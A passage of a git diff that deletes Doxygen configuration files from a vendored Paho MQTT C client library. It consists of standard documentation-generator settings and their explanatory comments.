-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI
deleted file mode 100644
index 7026856..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientAPI
+++ /dev/null
@@ -1,1803 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "../doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "../build/output/doc/MQTTClient/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
